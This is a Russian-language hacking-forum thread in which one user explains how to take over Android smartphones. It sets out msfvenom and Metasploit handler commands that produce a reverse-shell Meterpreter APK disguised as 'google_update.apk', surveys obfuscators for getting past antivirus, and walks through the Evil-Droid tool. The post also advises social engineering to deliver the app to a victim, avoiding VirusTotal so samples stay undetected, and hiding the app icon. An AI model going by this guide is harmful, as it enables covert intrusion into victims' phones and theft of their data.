Взлом смартфона на Android

Тема в разделе "Андроид / Android", создана пользователем yarr, 14 окт 2017.

  1. yarr

    yarr New Member

    Сообщения:
    410
    Симпатии:
    0
    Вcтупление.

    Все, кто знаком с Metasploit Project, скорее всего знакомы с MSFvenom (популярный генератор payload) и Meterpreter (расширяемая нагрузка для пост-эксплуатации). С помощью этих инструментов можно при определенных условиях получить НСД к Android-устройству (небольшой мануал для тех, кто не в теме ).
    Это выглядит примерно так:
    # cd/sdcard
    # msfvenom -p android/meterpreter/reverce_tcp lhost=192.168.1.45 lport=443 R google_update.apk
    # msfconsole
    # use exploit/multi/handler
    # set payload android/meterpreter/reverse_tcp
    # set lhost 192.168.1.45
    # set lport 443
    # exploit
    meterpreter
    Мануал предназначен для продвинутых пользователей, интересующихся мобильным пентестом и установкой кастомных прошивок. Это означает, что некоторые очевидные моменты я буду опускать. Cайты на которых есть подробности - 4pda, xda-developers, kali.org.

    Ссылки в рамках данного мануала не являются рекламой.



    Но не все так просто. Не зря выше я написал про "примерно" и "определенные условия". Я часто читаю комментарии под видео на YouTube от кретинов: "Автор мудак, ничего не объясняет, просто пишет команды в консоли". А вы думали вас еще бесплатно кто-то учить с 0 будет? Это вам не школа, сука. Нету никакой кнопки "ВЫСЛЕДИТЬ ПО IP И ВЗЛОМАТЬ"
    есть вычислить по IQ тупого школьника.
    В нашем деле нету однозначно работающих решений, мир вокруг нас постоянно меняется, в том числе ИТ-сфера, старые методы взлома перестают работать, все время надо искать что-то новое.

    Так вот, некоторых очень волнует вопрос: "А как закинуть наш google_update.apk на смартфон жертве, да еще чтобы AV не детектировал наш файл? Для этого нужно закриптовать
    обфусцировать приложение, прогнать через Zipalign, подписать и а также применить СИ для доставки на целевое устройство. Дефолтный apk, который выплевывает MSFvenom ни на что не годен - скажите, кто будет устанавливать приложение с названием:"MainActivity", без иконки, с кучей требуемых разрешений? К тому же его скорее всего с радостью схрумкает AV жертвы.

    Честно говоря есть еще один путь - собрать троян самостоятельно
    часть 1
    часть 2,
    но мне не хотелось ебаться с Android SDK.

    Я потратил немного времени на поиск обфускаторов для apk:
    1. AVPass - вроде бы годный, и главное свежий проект. Но, к сожалению, я пока с ним не разобрался. Он выдает битые приложения, Zipalign не помогает. Кто пробовал его в работе - просьба отписать в тему/личку
    (

    ).


    2. ProGuard - утилита, которая удаляет из скомпилированного кода неиспользуемые фрагменты и изменяет имена переменных и методов для усложнения реверс-инжиниринга приложения. Я сам мало работал с Android SDK и этот вариант не рассматривал, тоже было бы неплохо увидеть мануал по работе с ним
    (

    ).

    3. Stringer Java Obfuscation. Им я не пользовался, он платный, так же подозреваю что его выходную работу палят многие AV
    (

    ).

    4. Apkwash. Аналогично номеру 1, не было времени произвести полноценное тестирование. Вылезают какие-то странные баги.
    (
    ).


    5. Evil-Droid. Тоже свежий проект, как раз он мне и понравился. Он предоставляет возможность создать дефолтную/обфусцированную нагрузку для meterpreter, собственную подпись, проводить инжект в "чистые" apk, клонировать/делать фейковые страницы. Так же из скрипта можно запустить MSF
    ().


    6. DexProtector. По нему информации почти нет.
    (
    ).


    P.S. Если знаете еще способы - пишите в комментарии/личку

    Установка.

    Для начала ставим зависимости,
    metasploit-framework, xterm, Zenity, Aapt, Apktool, Zipalign, (если apt-get install не находит пакет, пишем название с маленькой буквы)затем сам скрипт:
    # git clone
    # cd Evil-Droid
    # chmod +x evil-droid


    Наши коллеги с другого форума решили форкнуть данный проект, пока доступна только русификация
    ВНИМАНИЕ: ни в ком случае не заливайте результаты своей работы на VirusTotal, используйте что-нибудь другое, не сливающее статистику. Либо просто тестируйте на виртуальной машине/реальном устройстве.


    Использование.

    1. запускаем скрипт: # ./evil-droid

    Напомню, что разрешения, которые запрашивает приложение при установке, могут вызвать подозрения у пользователя. Так же советую подробно изучить Android-опции в meterpreter (например hide_app_icon, send_sms) и поработать со скриптом из под NetHunter. По результатам моих тестов на реальном устройстве DrWeb и Avast ничего не заметили(я про активную защиту, что будет при сканировании не смотрел).



    P.S. Ввиду достаточного количества фото/видео материалов по данной теме(в основном на английском и др. иностранных языках) снимать свое видео/добавлять скриншоты не буду, все отличн
  2. yarr

    yarr New Member

    Сообщения:
    410
    Симпатии:
    0
    UPD. Вспомнил про конкурс. Ув. просьба выдать VC.
  3. BLVCK MVGIC

    BLVCK MVGIC New Member

    Сообщения:
    204
    Симпатии:
    0
    с такими хорошими авторскими темами ты выиграешь конкурс! Удачи!
  4. yarr

    yarr New Member

    Сообщения:
    410
    Симпатии:
    0
    Спасибо)
  5. yarr

    yarr New Member

    Сообщения:
    410
    Симпатии:
    0
    СООБЩЕНИЕ СКРЫТО ОТ ПРОСМОТРА - ЗАРЕГИСТРИРУЙТЕСЬ!
  6. Mobvernad

    Mobvernad New Member

    Сообщения:
    2
    Симпатии:
    0
    Есть телеграм?
    Напиши мне

Поделиться этой страницей